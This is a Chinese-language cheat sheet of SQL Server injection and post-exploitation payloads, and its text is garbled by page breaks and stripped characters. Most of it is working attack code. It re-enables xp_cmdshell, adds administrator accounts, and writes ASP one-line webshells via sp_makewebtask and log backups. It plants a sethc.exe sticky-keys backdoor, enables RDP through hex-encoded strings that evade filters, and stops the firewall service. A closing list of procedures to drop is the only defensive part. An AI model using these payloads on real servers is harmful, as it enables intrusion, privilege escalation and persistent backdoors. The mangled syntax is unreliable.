SQL高级注入使用之存储过程

1、SQL 高级注入使用之存储过程以下这都是我们老师给我的学习资料呵呵! ! 其实我也有的看不懂, 给朋友们中的一些高 手看看!我还是菜鸟呢 -_-! 。 。 。 。 。 。sql2005恢复 xp_cmdshellEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关 闭 :EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC

2、 sp_configure 'xp_cmdshell', 1;RECONFIGURE;零、- 添加 SA 用户 -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

3、&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

4、; &&&&&&&防注入 sa:itpro pass:itprodeclare s varchar(4000 set s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000;exec(s;2073797361646d696e as varchar(4000;exec(a;- and 1=1防注入 sa:system pass:system2c2073797361646d696e as varchar(4000;e

5、xec(a;- and 1=1一、-恢复存储过程 -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

6、;&&use masterexec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'exec sp_dropextendedproc "xp_cmdshell"exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'exec sp_dropextendedproc 'xp_cmdshell'exec sp_addextendedproc 'xp_cmdshell','xpweb

7、70.dll'exec sp_addextendedproc xp_dirtree,'xpstar.dll'exec sp_addextendedproc xp_enumgroups,'xplog70.dll'exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'exec sp_addextendedproc xp_loginconfig,'xplog70.dll'exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll

8、'exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'exec sp_addextendedproc sp_OACreate,'odsole70.dll'exec sp_addextendedproc sp_OADestroy,'odsole70.dll'exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'exec sp_addextendedproc sp_OAGetProperty,'odsole

9、70.dll'exec sp_addextendedproc sp_OAMethod,'odsole70.dll'exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'exec sp_addextendedproc sp_OAStop,'odsole70.dll'exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'exec sp_addextendedproc xp_regdeletekey,'xp

10、star.dll'exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'exec sp_addextendedproc xp_regread,'xpstar.dll'exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'exec sp_addextendedproc xp_regwrite,'

11、xpstar.dll'exec sp_addextendedproc xp_availablemedia,'xpstar.dll'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&am

12、p;&&&&& &&&&&&&&&&恢复 cmdshell 防注入=declare a varchar(255,b varchar(255,c varchar(255;set b=0x78705F636D647368656C6C;set c=0x78706C6F6737302E646C6C;exec a b,c=二、-恢复 sp_addextendedproc存储过程 -&&&&&&&&&&&am

13、p;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&create procedure sp_addextendedproc - 1996/08/3

14、0 20:13functname nvarchar(517,/* ( of function to call */ dllname varchar(255/* name of DLL containing function */ asset implicit_transactions offif trancount > 0beginraiserror(15002,-1,-1,'sp_addextendedproc'return (1enddbcc addextendedproc( functname, dllnamereturn (0 - sp_add

15、extendedprocGO&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&

16、&&&&三、-使用存储过程加管理方法 -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&am

17、p;&&&&&&&&2、 EXEC sp_resolve_logins 'text', 'e:asp"&net user admina admin /add&net localgroup administrators admina /add&dir "e:asp', '1.asp'3、 DECLARE shell INT EXEC SP_OAcreate 'wscript.shell',shell OUTPUT EXEC S

18、P_OAMETHODshell,'run',null, 'C:WINdowssystem32cmd.exe /c net user sadfish fish /add'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

19、&&&&&&&&&& &&&&&&&&&&&&四、- 导出文件的存储过程 -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

20、;&&&&&&&&&&&&&&& &&&&&&&&&&&&DECLARE shell INT EXEC SP_OAcreate 'wscript.shell',shell OUTPUT EXEC SP_OAMETHOD shell,'run',null, 'C:WINdowssystem32cmd.exe /c netstat -an >

21、;c:1.txt' &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&

22、&&&&&五、- 读取文件的存储过程 -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&

23、;&&&&&&&&&&declare o int, f int, t int, ret intdeclare line varchar(8000exec sp_oacreate 'scripting.filesystemobject', o outexec sp_oamethod o, 'opentextfile', f out, 'c:1.txt', 1exec ret = sp_oamethod f, 'readline', line outwhi

24、le( ret = 0 beginprint lineexec ret = sp_oamethod f, 'readline', line outend&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

25、amp;&&&&&& &&&&&&&&六、-写一句话木马 -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

26、;&&&&&&& &&&&&declare o int, f int, t int, ret intexec sp_oacreate 'scripting.filesystemobject', o outexec sp_oamethod o, 'createtextfile', f out, 'c:Inetpubtianhong2.asp', 1exec ret = sp_oamethod f, 'writeline', NULL,&#

27、39;<%execute(request("a"%>' ' ' 单引号为要写的内容<%25 if request("x"<>"" then execute(request("x"%25>&&&&&&&&&&&&&&&&&&&&&&&&&&&&a

28、mp;&&&&&&&&&&&&&&&&&&&&&& &&&&&&&防注入写入法= declare a int,b int,c varchar(255,d varchar(255,e varchar(255,f varchar(255,g varchar(255,h varchar(255,i varchar(255,j varchar(255;set d=0x6D6

29、1737465722E2E73705F6F616D6574686F64;set e=0x536372697074696E672E46696C6573797374656D4F626A656374;set g=0x433A5C496E65747075625C73797374656D2E617370;set h=0x74727565;set i=0x7772697465;exec c e,a output;exec d a,f,b output,g,h;exec d b,i,null,j= 七、-写一句话木马 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

30、xxxxxxxxxxxxxxxxxxxx在 上 面 一 样 ;exec%20sp_makewebtask%20'd:zjkdjzjkdjzjkdsbake.asp,'%20select%20''<%25execute(requ est("a"%25>''%20'- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx八、-SA 沙盒模式提权 -&&&&&&&&&

31、&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&1、 exec master.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE

32、MicrosoftJet4.0Engines','SandBoxMode','REG_D WORD',0;-&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

33、amp;&&&& &&&九、-另类 SA 提权 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2、 declare oo intexec sp_oacreate 'scripting.filesystemobject', oo outexec sp_oamethod oo, 'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32

34、dllcachesethc.exe'1、 declare o intexec sp_oacreate 'scripting.filesystemobject', o outexec sp_oamethod o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe' DECLARE o intDECLARE z intEXEC sp_OACreate 'Shell.Users',o OUTEXEC sp_OAMethod o

35、, 'Create', z OUT, 'test'EXEC sp_OASetProperty z, 'setting', 3 , 'AccountType'EXEC sp_OAMethod z, 'ChangePassword',NULL , '123456', ''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十、-导出注册表 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

36、xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1、 drop table regdir;create table regdir(value nvarchar(1000 null,data nvarchar(1000 null-2、 delete regdir;insert regdirexec master.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','port' xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

37、xxxxxxxxxxxxxxxxxxxxxxxxx十一、-下载程序 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十二、-Log 备份 WebShell- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxalter database master set RECOVERY FULLcreate table cmd (a image-backup log master to disk = 'c:cmd' wi

38、th initinsert into cmd (a values ('<%eval(request("a":response.end%>'-backup log master to disk = 'C:Inetpubwwwrootri3.asp'-drop table cmd-2use miralter database mir set RECOVERY FULL -create table cmd8 (a image-backup log mir to disk = 'c:cmd8' with init -ins

39、ert into cmd8 (a values ('<%eval(request("a":response.end%>'-backup log mir to disk = 'c:backup.asp'-drop table cmd8-alter database mir set RECOVERY SIMPLE -3create/*/table/*/dbo.shit_tmp/*/(cmd/*/image-declare/*/a/*/sysname,s/*/nvarchar(4000/*/select/*/a=db_name(,s=0

40、x6C0061006 F007A0068006F007500/*/backup/*/log/*/a/*/to/*/disk/*/=/*/s/*/with/*/init,no_truncate-init,no_truncate-Drop/*/table/*/shit_tmp- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十三、-创建 sp_readtextfile存储过程 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxC

41、reate proc sp_readTextFile filename sysnameasbeginset nocount onCreate table #tempfile (line varchar(8000exec ('bulk insert #tempfile from "' + filename + '"'select * from #tempfiledrop table #tempfileEndgoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十

42、四、开 3389= declare a varchar(255,b varchar(255; set a=0x6D61737465722E64626F2E78705F636D647368656C6C; set b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616 D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E 6E656374696F6E732031; exec a b=我记得 2003的 we

43、b 目录是写在 C:WINDOWSsystem32inetsrvMetaBase.xml-读取文件内容 -exec sp_readTextFile 'c:boot.ini'xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution Optionssethc.exe','debugger','reg_sz','c:windowssystem32cmd.exe'-清除 MsS

44、ql 日志 -xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxset nocount ondeclare logicalfilename sysname,maxminutes int,newsize intxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-停掉或激活某个服务 -exec master.xp_servicecontrol 'stop','sharedaccess'exec master.xp_servicecontrol 'start','sharedaccess'

45、-列出驱动器的名称 -EXEC master.dbo.xp_availablemedia-列出指定目录的所有下一级子目录 -EXEC master.dbo.xp_subdirs 'c:windows'-列出当前错误日志的具体内容 -EXEC master.dbo.xp_readerrorlog-列出当前计算机名称 -execute master.xp_getnetname-列出当前计算机的驱动器可用空间 -execute master.xp_fixeddrives=列出服务器所有本地组 =execute master.xp_enumgroups=获取 MS SQL的版本号 =e

46、xecute master.sp_msgetversion= =参数说明 :目录名 , 目录深度 , 是否显示文件 = execute master.xp_dirtree 'c:'execute master.xp_dirtree 'c:',1execute master.xp_dirtree 'c:',1,1= =列出服务器上安装的所有 OLEDB 提供的程序 = = execute master.xp_enum_oledb_providers=列出服务器上配置的 DNS=execute master.xp_enumdsn删除存储过程drop

47、PROCEDURE sp_addextendedproc-删除 sql 危险存储过程 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx DROP PROCEDURE sp_makewebtaskexec master.sp_dropextendedproc xp_cmdshellexec master.sp_dropextendedproc xp_dirtreeexec master.sp_dropextendedproc xp_fileexistexec master.sp_dropextendedproc xp_terminate_pro

48、cess exec master.sp_dropextendedproc sp_oamethodexec master.sp_dropextendedproc sp_oacreateexec master.sp_dropextendedproc xp_regaddmultistring exec master.sp_dropextendedproc xp_regdeletekeyexec master.sp_dropextendedproc xp_regdeletevalue exec master.sp_dropextendedproc xp_regenumkeysexec master.s

49、p_dropextendedproc xp_regenumvalues exec master.sp_dropextendedproc sp_add_jobexec master.sp_dropextendedproc sp_addtaskexec master.sp_dropextendedproc xp_regreadexec master.sp_dropextendedproc xp_regwriteexec master.sp_dropextendedproc xp_readwebtaskexec master.sp_dropextendedproc xp_makewebtaskexec master.sp_dropextendedproc xp_r